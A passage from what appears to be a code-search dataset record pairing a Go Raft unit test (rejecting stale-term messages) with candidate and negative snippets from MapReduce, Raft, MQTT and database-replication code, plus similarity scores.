{\n\n\tGoMaxProc(\"worker\", configFile)\n\tConBufferSize(\"worker\", configFile)\n\tprocesses, err := configFile.GetInt(\"worker\", \"processes\")\n\tif err != nil {\n\t\tlogger.Warn(err)\n\t\tprocesses = 3\n\t}\n\tmasterhost := GetRequiredString(configFile, \"worker\", \"masterhost\")\n\tlogger.Printf(\"StartWorker() [%v, %d]\", masterhost, processes)\n\tRunNode(processes, masterhost)\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\n\t// uncomment to send the Example RPC to the master.\n\t// CallExample()\n\tfor {\n\t\targs := RPCArgs{}\n\t\treply := RPCReply{}\n\t\tcall(\"Master.GetTask\", &args, &reply)\n\t\tswitch reply.TaskInfo.TaskType {\n\t\tcase Map:\n\t\t\tdoMap(&reply.TaskInfo, mapf)\n\t\tcase Reduce:\n\t\t\tdoReduce(&reply.TaskInfo, reducef)\n\t\tcase Wait:\n\t\t\tfmt.Println(\"Waiting task\")\n\t\t\ttime.Sleep(time.Second)\n\t\t\tcontinue\n\t\tcase Done:\n\t\t\tfmt.Println(\"All task done\")\n\t\t\treturn\n\t\t}\n\t\targs.TaskInfo = reply.TaskInfo\n\t\tcall(\"Master.TaskDone\", &args, &reply)\n\t}\n}", "func NewMasterNode(seed []byte) (*Node, error) {\n\t// Check if seed has valid size\n\tif len(seed) < minSeedSize || len(seed) > maxSeedSize {\n\t\treturn nil, errors.New(\"NewMasterNode: invalid seed size\")\n\t}\n\n\t// Generate HMAC-SHA512 with hardcoded seed as Key\n\th := hmac.New(hasher.SHA2_512.New, []byte(\"Bitcoin seed\"))\n\n\t// Data: H(seed)\n\th.Write(seed)\n\taux := h.Sum(nil)\n\n\t// Validate Private Key\n\terr := validatePrivateKey(aux[:keySize])\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Export Key and Chain Code from aux\n\tnode := &Node{\n\t\tKey: aux[:keySize],\n\t\tCode: aux[keySize:],\n\t}\n\treturn node, nil\n}", "func NewMasterIndex() *MasterIndex {\n\t// Always add an empty final index, such that MergeFinalIndexes can merge into this.\n\t// Note that removing this index could lead to a race condition in the rare\n\t// sitation that only two indexes exist which are saved and merged concurrently.\n\tidx := []*Index{NewIndex()}\n\tidx[0].Finalize()\n\treturn &MasterIndex{idx: idx, pendingBlobs: restic.NewBlobSet()}\n}", "func (m *Master) Start() int {\n\tgo m.input.run()\n\tfor _, workers := range m.workers {\n\t\tfor _, worker := range workers {\n\t\t\tgo worker.run()\n\t\t}\n\t}\n\tgo m.output.run()\n\treturn <-m.output.endChannel\n}", "func NewMasterNode() *MasterNode {\n\tcurrentNode := MasterNode{}\n\tcurrentNode.Slaves = make(map[*websocket.Conn]bool)\n\tcurrentNode.broadcast = make(chan []byte)\n\treturn &currentNode\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\n\t// uncomment to send the Example RPC to the master.\n\t// CallExample()\n\tfor{\n\t\tgetNext := GetTask(mapf, reducef)\n\t\tif(!getNext){\n\t\t\tbreak\n\t\t}\n\t}\n\t\n}", "func main() {\n\tlog.SetFlags(log.Lshortfile | log.LstdFlags)\n\t// show log line\n\tif len(os.Args) < 4 {\n\t\tfmt.Printf(\"%s: see usage comments in file\\n\", os.Args[0])\n\t} else if os.Args[1] == \"master\" {\n\t\tvar mr *mapreduce.Master\n\t\tif os.Args[2] == \"sequential\" {\n\t\t\tmr = mapreduce.Sequential(\"wcseq\", os.Args[3:], 3, mapF, reduceF)\n\t\t} else {\n\t\t\tmr = mapreduce.Distributed(\"wcseq\", os.Args[3:], 3, os.Args[2])\n\t\t}\n\t\tmr.Wait()\n\t} else {\n\t\tmapreduce.RunWorker(os.Args[2], os.Args[3], mapF, reduceF, 100, nil)\n\t}\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t\tports = Ports{ usedPorts: make(map[int]bool) }\n\t\t\n\n\t\tjob := new(Job)\n\t\tjob.MapFunc = mapf\n\t\tjob.RedFunc = reducef\n\t\tjob.JobType = Mapper\n\n\n\t\tspawnChannel := make(chan int)\n\t\tsomechan := make(chan bool)\n\t\tgo StartRPCClient(spawnChannel, somechan, job)\n\n\t\ttime.Sleep(10*time.Millisecond)\n\t\tgo SpawnReducers(somechan, job)\n\t\tSpawnMappers(spawnChannel, job)\n}", "func NewCfnMaster(scope awscdk.Construct, id *string, props *CfnMasterProps) CfnMaster {\n\t_init_.Initialize()\n\n\tj := jsiiProxy_CfnMaster{}\n\n\t_jsii_.Create(\n\t\t\"monocdk.aws_guardduty.CfnMaster\",\n\t\t[]interface{}{scope, id, props},\n\t\t&j,\n\t)\n\n\treturn &j\n}", "func NewMultiNode(leader bool, size int64) *multiNode {\n\tm := &multiNode{\n\t\tcursor: int64(initSeqValue),\n\t\tcommitted: make([]int32, size),\n\t\tmask: size - 1,\n\t\tshift: uint8(math.Log2(float64(size))),\n\t}\n\n\tif leader {\n\t\tm.barrier = size\n\t}\n\n\tfor i := int64(0); i < size; i++ {\n\t\tm.committed[i] = int32(initSeqValue)\n\t}\n\treturn m\n}", "func (b *ClusterNodesBuilder) Master(value int) *ClusterNodesBuilder {\n\tb.master = &value\n\treturn b\n}", "func (agent *ActionAgent) InitMaster(ctx context.Context) (string, error) {\n\tif err := agent.lock(ctx); err != nil {\n\t\treturn \"\", err\n\t}\n\tdefer agent.unlock()\n\n\t// Initializing as master implies undoing any previous \"do not replicate\".\n\tagent.setSlaveStopped(false)\n\n\t// we need to insert something in the binlogs, so we can get the\n\t// current position. Let's just use the mysqlctl.CreateReparentJournal commands.\n\tcmds := mysqlctl.CreateReparentJournal()\n\tif err := agent.MysqlDaemon.ExecuteSuperQueryList(ctx, cmds); err != nil {\n\t\treturn \"\", err\n\t}\n\n\t// get the current replication position\n\tpos, err := agent.MysqlDaemon.MasterPosition()\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\t// If using semi-sync, we need to enable it before going read-write.\n\tif err := agent.fixSemiSync(topodatapb.TabletType_MASTER); err != nil {\n\t\treturn \"\", err\n\t}\n\n\t// Set the server read-write, from now on we can accept real\n\t// client writes. Note that if semi-sync replication is enabled,\n\t// we'll still need some slaves to be able to commit transactions.\n\tstartTime := time.Now()\n\tif err := agent.MysqlDaemon.SetReadOnly(false); err != nil {\n\t\treturn \"\", err\n\t}\n\tagent.setExternallyReparentedTime(startTime)\n\n\t// Change our type to master if not already\n\tif _, err := agent.TopoServer.UpdateTabletFields(ctx, agent.TabletAlias, func(tablet *topodatapb.Tablet) error {\n\t\ttablet.Type = topodatapb.TabletType_MASTER\n\t\treturn nil\n\t}); err != nil {\n\t\treturn \"\", err\n\t}\n\n\t// and refresh our state\n\tagent.initReplication = true\n\tif err := agent.refreshTablet(ctx, \"InitMaster\"); err != nil {\n\t\treturn \"\", err\n\t}\n\treturn mysql.EncodePosition(pos), nil\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t//Your worker implementation here.\n\tmJobChan := make(chan MRJob)\n\trJobChan := make(chan MRJob)\n\tctx, cancel := context.WithCancel(context.Background()) // used to manage the MR Job\n\targs := MRArgs{\n\t\tStatus: \"INITIAL\",\n\t}\n\n\tgo requestJob(cancel, args, mJobChan, rJobChan)\n\n\tfor {\n\t\tselect {\n\t\tcase mJob := <-mJobChan:\n\t\t\terr := doMap(mapf, mJob)\n\t\t\tif err != nil {\n\t\t\t\targs.Status = \"FAILED\"\n\t\t\t} else {\n\t\t\t\targs.Status = \"FINISHED\"\n\t\t\t}\n\t\t\targs.MId = mJob.JobNum\n\t\t\targs.RId = -1\n\t\t\targs.JobType = \"MAP\"\n\t\t\tlog.Printf(\"MAP: %v, %v request Job\", args.Status, args.MId)\n\t\t\tgo requestJob(cancel, args, mJobChan, rJobChan)\n\t\tcase rJob := <-rJobChan:\n\t\t\terr := doReduce(reducef, rJob)\n\t\t\tif err != nil {\n\t\t\t\targs.Status = \"FAILED\"\n\t\t\t} else {\n\t\t\t\targs.Status = \"FINISHED\"\n\t\t\t}\n\t\t\targs.MId = -1\n\t\t\targs.RId = rJob.JobNum\n\t\t\targs.JobType = \"REDUCE\"\n\t\t\tlog.Printf(\"REDUCE: %v %v, request Job\", args.Status, args.RId)\n\t\t\tgo requestJob(cancel, args, mJobChan, rJobChan)\n\t\tcase <-ctx.Done():\n\t\t\tlog.Println(\"Worker is stopped\")\n\t\t\treturn\n\t\t}\n\t}\n\n\t// uncomment to send the Example RPC to the master.\n\t//CallExample()\n}", "func main(){\n\tmc := master.LoadConfig()\n\terrList := master.Start(mc.Num_instances, mc.Selection_config, mc.Ports)\n\tfor i, err := range errList {\n\t\tlog.Println(\"ERR: \", i, \"th master terminated with error: \", err)\n\t}\n\n}" ]
[ "0.8002119", "0.7995797", "0.7962175", "0.7938654", "0.7938438", "0.7934938", "0.7905836", "0.7880066", "0.7851733", "0.7834671", "0.77987695", "0.77802426", "0.7772365", "0.7745725", "0.77451676", "0.76724774", "0.76557", "0.76477695", "0.7533418", "0.752726", "0.7493959", "0.7492427", "0.7473971", "0.746347", "0.7453425", "0.7447099", "0.7427945", "0.741094", "0.73979044", "0.7373853", "0.7133861", "0.6921197", "0.6040458", "0.5997459", "0.59152263", "0.5856602", "0.5834348", "0.57695556", "0.5755737", "0.57207847", "0.56940377", "0.5691996", "0.56679094", "0.56427354", "0.5617632", "0.56053", "0.55969036", "0.5571494", "0.55539894", "0.55430555", "0.552097", "0.55077004", "0.5506373", "0.5503208", "0.5482691", "0.54038495", "0.5391501", "0.53748333", "0.5353245", "0.53330886", "0.5314062", "0.5310851", "0.53024364", "0.5265156", "0.5253997", "0.5224047", "0.5202937", "0.5191195", "0.51838315", "0.5125166", "0.5117486", "0.50837445", "0.50700927", "0.50700927", "0.5068729", "0.50502163", "0.5050145", "0.5046045", "0.5033763", "0.5016726", "0.501615", "0.5012144", "0.49932334", "0.49886122", "0.4983097", "0.498157", "0.49772093", "0.49664846", "0.49359417", "0.493139", "0.49179327", "0.49093723", "0.48808208", "0.48727065", "0.4858625", "0.48196703", "0.47858042", "0.4782845", "0.47812104", "0.47761616" ]
0.7983713
2
TestRejectStaleTermMessage tests that if a server receives a request with a stale term number, it rejects the request. Our implementation ignores the request instead. Reference: section 5.1
func TestRejectStaleTermMessage(t *testing.T) { called := false fakeStep := func(r *raft, m pb.Message) bool { called = true return false } r := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage()) defer closeAndFreeRaft(r) r.step = fakeStep r.loadState(pb.HardState{Term: 2}) r.Step(pb.Message{Type: pb.MsgApp, Term: r.Term - 1}) if called { t.Errorf("stepFunc called = %v, want %v", called, false) } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (r *Raft) handleStaleTerm(replication *followerReplication) {\n\tklog.Errorf(fmt.Sprintf(\"peer:%s/%s has newer term, stopping replication\", replication.peer.ID, replication.peer.Address))\n\treplication.notifyAll(false) // No longer leader\n\tselect {\n\tcase replication.stepDown <- struct{}{}:\n\tdefault:\n\t}\n}", "func TestLeaderTransferReceiveHigherTermVote(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tnt.isolate(3)\n\n\tlead := nt.peers[1].(*raft)\n\n\t// Transfer leadership to isolated node to let transfer pending.\n\tnt.send(pb.Message{From: 3, To: 1, Type: pb.MsgTransferLeader})\n\tif lead.leadTransferee != 3 {\n\t\tt.Fatalf(\"wait transferring, leadTransferee = %v, want %v\", lead.leadTransferee, 3)\n\t}\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup, Index: 1, Term: 2})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n}", "func testDelayedRevokeWithLeaseRequest2() {\n\tst.SetDelay(2) // Lease expires before revoking finishes\n\tdefer st.ResetDelay()\n\n\tkey1 := \"revokekey:15\"\n\n\t// function called during revoke of key1\n\tf := func() bool {\n\t\tts := time.Now()\n\t\t// get key1 and want a lease\n\t\treplyG, err := st.Get(key1, true)\n\t\tif checkErrorStatus(err, replyG.Status, storageproto.OK) {\n\t\t\treturn true\n\t\t}\n\t\tif isTimeOK(time.Since(ts)) {\n\t\t\t// in this case, server should reply old value and refuse lease\n\t\t\tif replyG.Lease.Granted || replyG.Value != \"old-value\" {\n\t\t\t\tfmt.Fprintln(output, \"FAIL: server should return old value and not grant lease\")\n\t\t\t\tfailCount++\n\t\t\t\treturn true\n\t\t\t}\n\t\t} else {\n\t\t\tif st.comp_revoke[key1] || (!replyG.Lease.Granted || replyG.Value != \"new-value\") {\n\t\t\t\tfmt.Fprintln(output, \"FAIL: server should return new value and grant lease\")\n\t\t\t\tfailCount++\n\t\t\t\treturn true\n\t\t\t}\n\t\t}\n\t\treturn false\n\t}\n\n\tif delayedRevoke(key1, f) {\n\t\treturn\n\t}\n\tfmt.Fprintln(output, \"PASS\")\n\tpassCount++\n}", "func testDelayedRevokeWithLeaseRequest1() {\n\tst.SetDelay(0.5) // Revoke finishes before lease expires\n\tdefer st.ResetDelay()\n\n\tkey1 := \"revokekey:5\"\n\n\t// function called during revoke of key1\n\tf := func() bool {\n\t\tts := time.Now()\n\t\t// get key1 and want a lease\n\t\treplyG, err := st.Get(key1, true)\n\t\tif checkErrorStatus(err, replyG.Status, storageproto.OK) {\n\t\t\treturn true\n\t\t}\n\t\tif isTimeOK(time.Since(ts)) {\n\t\t\t// in this case, server should reply old value and refuse lease\n\t\t\tif replyG.Lease.Granted || replyG.Value != \"old-value\" {\n\t\t\t\tfmt.Fprintln(output, \"FAIL: server should return old value and not grant lease\")\n\t\t\t\tfailCount++\n\t\t\t\treturn true\n\t\t\t}\n\t\t} else {\n\t\t\tif !st.comp_revoke[key1] || (!replyG.Lease.Granted || replyG.Value != \"new-value\") {\n\t\t\t\tfmt.Fprintln(output, \"FAIL: server should return new value and grant lease\")\n\t\t\t\tfailCount++\n\t\t\t\treturn true\n\t\t\t}\n\t\t}\n\t\treturn false\n\t}\n\n\tif delayedRevoke(key1, f) {\n\t\treturn\n\t}\n\tfmt.Fprintln(output, \"PASS\")\n\tpassCount++\n}", "func (tc *TestCase) TestCorruptLoseTract() error {\n\t// We need at least five tractservers.\n\tif tc.clusterCfg.Tractservers < 5 {\n\t\treturn fmt.Errorf(\"need at least five tractservers for TestCorruptTract\")\n\t}\n\n\t// Create a blob and write some data to it.\n\tblob, err := tc.c.Create()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tdata := makeRandom(1 * mb)\n\tblob.Seek(0, os.SEEK_SET)\n\tif n, err := blob.Write(data); err != nil || n != len(data) {\n\t\treturn err\n\t}\n\n\t// Pick two random tractservers that own the first tract. We will do\n\t// something evil to them.\n\ttracts, err := tc.c.GetTracts(context.Background(), blob.ID(), 0, 1)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif len(tracts) == 0 {\n\t\treturn fmt.Errorf(\"The blob has no tracts\")\n\t}\n\tfirstTract := tracts[0]\n\tfirstTS := int(rand.Uint32()) % len(firstTract.Hosts)\n\tsecondTS := (firstTS + 1) % len(firstTract.Hosts)\n\n\tcapture := tc.captureLogs()\n\n\t// Corrupt the replica on the first picked ts.\n\tif err := tc.corruptTract(firstTract.Tract, tc.bc.FindByServiceAddress(firstTract.Hosts[firstTS]), 1234); err != nil {\n\t\treturn err\n\t}\n\t// Kill the second picked ts.\n\tproc, perr := tc.getTractserverProc(firstTract.Tract, secondTS)\n\tif perr != nil {\n\t\treturn perr\n\t}\n\tproc.Stop()\n\n\t// Trigger a rereplication request.\n\tif err := tc.triggerRereplRequest(firstTract.Tract); err != nil {\n\t\treturn err\n\t}\n\n\t// Wait for a curator to log success.\n\tlog.Infof(\"waiting for rerepl...\")\n\tif err := capture.WaitFor(\n\t\tfmt.Sprintf(\"c:@@@ rerepl %v succeeded\", firstTract.Tract)); err != nil {\n\t\treturn err\n\t}\n\n\t// Now a write should succeed.\n\tblob.Seek(0, os.SEEK_SET)\n\tn, werr := blob.Write([]byte(\"spicy sichuan food\"))\n\tif werr != nil {\n\t\treturn werr\n\t}\n\tlog.Infof(\"wrote %d bytes\", n)\n\n\treturn nil\n}", "func TestCannotCommitWithoutNewTermEntry(t *testing.T) {\n\ttt := newNetwork(nil, nil, nil, nil, nil)\n\tdefer tt.closeAll()\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// 0 cannot reach 2,3,4\n\ttt.cut(1, 3)\n\ttt.cut(1, 4)\n\ttt.cut(1, 5)\n\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\n\tsm := tt.peers[1].(*raft)\n\tif sm.raftLog.committed != 1 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 1)\n\t}\n\n\t// network recovery\n\ttt.recover()\n\t// avoid committing ChangeTerm proposal\n\ttt.ignore(pb.MsgApp)\n\n\t// elect 2 as the new leader with term 2\n\ttt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// no log entries from previous term should be committed\n\tsm = tt.peers[2].(*raft)\n\tif sm.raftLog.committed != 1 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 1)\n\t}\n\n\ttt.recover()\n\t// send heartbeat; reset wait\n\ttt.send(pb.Message{From: 2, To: 2, Type: pb.MsgBeat})\n\t// append an entry at current term\n\ttt.send(pb.Message{From: 2, To: 2, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\t// expect the committed to be advanced\n\tif sm.raftLog.committed != 5 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 5)\n\t}\n}", "func TestHandleHeartbeatResp(t *testing.T) {\n\tstorage := NewMemoryStorage()\n\tdefer storage.Close()\n\tstorage.Append([]pb.Entry{{Index: 1, Term: 1}, {Index: 2, Term: 2}, {Index: 3, Term: 3}})\n\tsm := newTestRaft(1, []uint64{1, 2}, 5, 1, storage)\n\tsm.becomeCandidate()\n\tsm.becomeLeader()\n\tsm.raftLog.commitTo(sm.raftLog.lastIndex())\n\n\t// A heartbeat response from a node that is behind; re-send MsgApp\n\tsm.Step(pb.Message{From: 2, Type: pb.MsgHeartbeatResp})\n\tmsgs := sm.readMessages()\n\tif len(msgs) != 1 {\n\t\tt.Fatalf(\"len(msgs) = %d, want 1\", len(msgs))\n\t}\n\tif msgs[0].Type != pb.MsgApp {\n\t\tt.Errorf(\"type = %v, want MsgApp\", msgs[0].Type)\n\t}\n\n\t// A second heartbeat response generates another MsgApp re-send\n\tsm.Step(pb.Message{From: 2, Type: pb.MsgHeartbeatResp})\n\tmsgs = sm.readMessages()\n\tif len(msgs) != 1 {\n\t\tt.Fatalf(\"len(msgs) = %d, want 1\", len(msgs))\n\t}\n\tif msgs[0].Type != pb.MsgApp {\n\t\tt.Errorf(\"type = %v, want MsgApp\", msgs[0].Type)\n\t}\n\n\t// Once we have an MsgAppResp, heartbeats no longer send MsgApp.\n\tsm.Step(pb.Message{\n\t\tFrom: 2,\n\t\tType: pb.MsgAppResp,\n\t\tIndex: msgs[0].Index + uint64(len(msgs[0].Entries)),\n\t})\n\t// Consume the message sent in response to MsgAppResp\n\tsm.readMessages()\n\n\tsm.Step(pb.Message{From: 2, Type: pb.MsgHeartbeatResp})\n\tmsgs = sm.readMessages()\n\tif len(msgs) != 0 {\n\t\tt.Fatalf(\"len(msgs) = %d, want 0: %+v\", len(msgs), msgs)\n\t}\n}", "func TestRGITBasic_TestDeleteRaftLogWhenNewTermElection(t *testing.T) {\n\n\ttestInitAllDataFolder(\"TestRGIT_TestDeleteRaftLogWhenNewTermElection\")\n\traftGroupNodes := testCreateThreeNodes(t, 20*1024*1024)\n\tdefer func() {\n\t\ttestDestroyRaftGroups(raftGroupNodes)\n\t}()\n\tproposeMessages := testCreateMessages(t, 10)\n\ttestDoProposeDataAndWait(t, raftGroupNodes, proposeMessages)\n\n\t// get leader information\n\tleaderNode := testGetLeaderNode(t, raftGroupNodes)\n\tlastIndex, err := leaderNode.storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tlastTerm, err := leaderNode.storage.Term(lastIndex)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"first propose, last index:%d, last term: %d\\n\", lastIndex, lastTerm)\n\tfmt.Printf(\"first propose, last index:%d, last term: %d\\n\", lastIndex, lastTerm)\n\n\t// stop 2 raft node\n\traftGroupNodes[0].Stop()\n\traftGroupNodes[1].Stop()\n\n\t// insert wrong message(which will be replace by new leader) into the last node\n\twrongMessages := testCreateMessages(t, 20)\n\twrongEntries := make([]raftpb.Entry, 0)\n\n\tfor i, msg := range wrongMessages {\n\t\tb := make([]byte, 8+len(msg))\n\t\tbinary.BigEndian.PutUint64(b, uint64(i+1))\n\t\tcopy(b[8:], []byte(msg))\n\n\t\tentry := raftpb.Entry{\n\t\t\tTerm: lastTerm,\n\t\t\tIndex: lastIndex + uint64(i+1),\n\t\t\tType: raftpb.EntryNormal,\n\t\t\tData: b,\n\t\t}\n\t\twrongEntries = append(wrongEntries, entry)\n\n\t}\n\traftGroupNodes[2].storage.StoreEntries(wrongEntries)\n\tfmt.Printf(\"save wrong message success, begin index: %d, term: %d\\n\", wrongEntries[0].Index, wrongEntries[0].Term)\n\twrongIndex, err := raftGroupNodes[2].storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"save wrong message to node[2], last index :%d\", wrongIndex)\n\n\traftGroupNodes[2].Stop()\n\n\t// restart\n\traftGroupNodes[0].Start()\n\traftGroupNodes[1].Start()\n\n\t// wait a new leader\n\ttime.Sleep(5 * time.Second)\n\tleaderNode = testGetLeaderNode(t, raftGroupNodes)\n\tleaderLastIndex, err := leaderNode.storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tleaderLastTerm, err := leaderNode.storage.Term(leaderLastIndex)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"after restart, leader last term: %d, last index: %d\\n\", leaderLastTerm, leaderLastIndex)\n\tfmt.Printf(\"after restart, leader last term: %d, last index: %d\\n\", leaderLastTerm, leaderLastIndex)\n\n\t// start the last one node\n\traftGroupNodes[2].Start()\n\t// wait leader append entries\n\ttime.Sleep(5 * time.Second)\n\n\t// check the raft log of last node will be replicated by new leader\n\tlastIndex, err = raftGroupNodes[2].storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tlastTerm, err = raftGroupNodes[2].storage.Term(lastIndex)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"the node with wrong message after restart, last term: %d, last index:%d \\n\", lastTerm, lastIndex)\n\tfmt.Printf(\"the node with wrong message after restart, last term: %d, last index:%d \\n\", lastTerm, lastIndex)\n\n\tif lastIndex != leaderLastIndex {\n\t\tt.Fatalf(\"the node[2] after restart doesn't match the new leader, the wrong node index:%d, but the leader:%d\", lastIndex, leaderLastIndex)\n\t}\n\n\tif lastTerm != leaderLastTerm {\n\t\tt.Fatalf(\"the node[2] after restart doesn't match the new leader, the wrong node term :%d, but the leader:%d\", lastTerm, leaderLastTerm)\n\t}\n\n}", "func TestStepIgnoreOldTermMsg(t *testing.T) {\n\tcalled := false\n\tfakeStep := func(r *raft, m pb.Message) bool {\n\t\tcalled = true\n\t\treturn false\n\t}\n\tsm := newTestRaft(1, []uint64{1}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(sm)\n\tsm.step = fakeStep\n\tsm.Term = 2\n\tsm.Step(pb.Message{Type: pb.MsgApp, Term: sm.Term - 1})\n\tif called {\n\t\tt.Errorf(\"stepFunc called = %v , want %v\", called, false)\n\t}\n}", "func RetainedMessageTest(t *testing.T, config *Config, out, in string, sub, pub packet.QOS) {\n\tassert.NoError(t, client.ClearRetainedMessage(client.NewConfig(config.URL), out, 10*time.Second))\n\n\ttime.Sleep(config.MessageRetainWait)\n\n\tretainer := client.New()\n\n\tcf, err := retainer.Connect(client.NewConfig(config.URL))\n\tassert.NoError(t, err)\n\tassert.NoError(t, cf.Wait(10*time.Second))\n\tassert.Equal(t, packet.ConnectionAccepted, cf.ReturnCode())\n\tassert.False(t, cf.SessionPresent())\n\n\tpf, err := retainer.Publish(out, testPayload, pub, true)\n\tassert.NoError(t, err)\n\tassert.NoError(t, pf.Wait(10*time.Second))\n\n\ttime.Sleep(config.MessageRetainWait)\n\n\terr = retainer.Disconnect()\n\tassert.NoError(t, err)\n\n\treceiver := client.New()\n\n\twait := make(chan struct{})\n\n\treceiver.Callback = func(msg *packet.Message, err error) error {\n\t\tassert.NoError(t, err)\n\t\tassert.Equal(t, out, msg.Topic)\n\t\tassert.Equal(t, testPayload, msg.Payload)\n\t\tassert.Equal(t, sub, msg.QOS)\n\t\tassert.True(t, msg.Retain)\n\n\t\tclose(wait)\n\t\treturn nil\n\t}\n\n\tcf, err = receiver.Connect(client.NewConfig(config.URL))\n\tassert.NoError(t, err)\n\tassert.NoError(t, cf.Wait(10*time.Second))\n\tassert.Equal(t, packet.ConnectionAccepted, cf.ReturnCode())\n\tassert.False(t, cf.SessionPresent())\n\n\tsf, err := receiver.Subscribe(in, sub)\n\tassert.NoError(t, err)\n\tassert.NoError(t, sf.Wait(10*time.Second))\n\tassert.Equal(t, []packet.QOS{sub}, sf.ReturnCodes())\n\n\tsafeReceive(wait)\n\n\ttime.Sleep(config.NoMessageWait)\n\n\terr = receiver.Disconnect()\n\tassert.NoError(t, err)\n}", "func TestReqRespTimeoutErr(t *testing.T) {\n\t// Connect to NATS\n\tm := NewMessenger(testConfig)\n\tdefer m.Close()\n\n\t// Use a WaitGroup to wait for the message to arrive\n\twg := sync.WaitGroup{}\n\twg.Add(1)\n\n\t// Subscribe to the source subject with the message processing function\n\ttestSubject := \"test_subject\"\n\ttestMsgContent := []byte(\"Some text to send...\")\n\tm.Response(testSubject, func(content []byte) ([]byte, error) {\n\t\tdefer wg.Done()\n\t\trequire.EqualValues(t, content, testMsgContent)\n\t\ttime.Sleep(100 * time.Millisecond)\n\t\treturn []byte(``), nil\n\t})\n\n\t// Send a message\n\t_, err := m.Request(testSubject, testMsgContent, 50*time.Millisecond)\n\tassert.NotNil(t, err)\n\tassert.Equal(t, err, errors.New(\"nats: timeout\"), \"should be equal\")\n\n\t// Wait for the message to come in\n\twg.Wait()\n}", "func RetainedMessageResubscriptionTest(t *testing.T, config *Config, topic string) {\n\tassert.NoError(t, client.ClearRetainedMessage(client.NewConfig(config.URL), topic, 10*time.Second))\n\n\ttime.Sleep(config.MessageRetainWait)\n\n\tretainer := client.New()\n\n\tcf, err := retainer.Connect(client.NewConfig(config.URL))\n\tassert.NoError(t, err)\n\tassert.NoError(t, cf.Wait(10*time.Second))\n\tassert.Equal(t, packet.ConnectionAccepted, cf.ReturnCode())\n\tassert.False(t, cf.SessionPresent())\n\n\tpf, err := retainer.Publish(topic, testPayload, 0, true)\n\tassert.NoError(t, err)\n\tassert.NoError(t, pf.Wait(10*time.Second))\n\n\ttime.Sleep(config.MessageRetainWait)\n\n\terr = retainer.Disconnect()\n\tassert.NoError(t, err)\n\n\treceiver := client.New()\n\twait := make(chan struct{}, 1)\n\n\treceiver.Callback = func(msg *packet.Message, err error) error {\n\t\tassert.NoError(t, err)\n\t\tassert.Equal(t, topic, msg.Topic)\n\t\tassert.Equal(t, testPayload, msg.Payload)\n\t\tassert.Equal(t, packet.QOS(0), msg.QOS)\n\t\tassert.True(t, msg.Retain)\n\n\t\twait <- struct{}{}\n\t\treturn nil\n\t}\n\n\tcf, err = receiver.Connect(client.NewConfig(config.URL))\n\tassert.NoError(t, err)\n\tassert.NoError(t, cf.Wait(10*time.Second))\n\tassert.Equal(t, packet.ConnectionAccepted, cf.ReturnCode())\n\tassert.False(t, cf.SessionPresent())\n\n\tsf, err := receiver.Subscribe(topic, 0)\n\tassert.NoError(t, err)\n\tassert.NoError(t, sf.Wait(10*time.Second))\n\tassert.Equal(t, []packet.QOS{0}, sf.ReturnCodes())\n\n\tsafeReceive(wait)\n\n\tsf, err = receiver.Subscribe(topic, 0)\n\tassert.NoError(t, err)\n\tassert.NoError(t, sf.Wait(10*time.Second))\n\tassert.Equal(t, []packet.QOS{0}, sf.ReturnCodes())\n\n\tsafeReceive(wait)\n\n\ttime.Sleep(config.NoMessageWait)\n\n\terr = receiver.Disconnect()\n\tassert.NoError(t, err)\n}", "func DirectRetainedMessageTest(t *testing.T, config *Config, topic string) {\n\tassert.NoError(t, client.ClearRetainedMessage(client.NewConfig(config.URL), topic, 10*time.Second))\n\n\ttime.Sleep(config.MessageRetainWait)\n\n\tc := client.New()\n\twait := make(chan struct{})\n\n\tc.Callback = func(msg *packet.Message, err error) error {\n\t\tassert.NoError(t, err)\n\t\tassert.Equal(t, topic, msg.Topic)\n\t\tassert.Equal(t, testPayload, msg.Payload)\n\t\tassert.Equal(t, packet.QOS(0), msg.QOS)\n\t\tassert.False(t, msg.Retain)\n\n\t\tclose(wait)\n\t\treturn nil\n\t}\n\n\tcf, err := c.Connect(client.NewConfig(config.URL))\n\tassert.NoError(t, err)\n\tassert.NoError(t, cf.Wait(10*time.Second))\n\tassert.Equal(t, packet.ConnectionAccepted, cf.ReturnCode())\n\tassert.False(t, cf.SessionPresent())\n\n\tsf, err := c.Subscribe(topic, 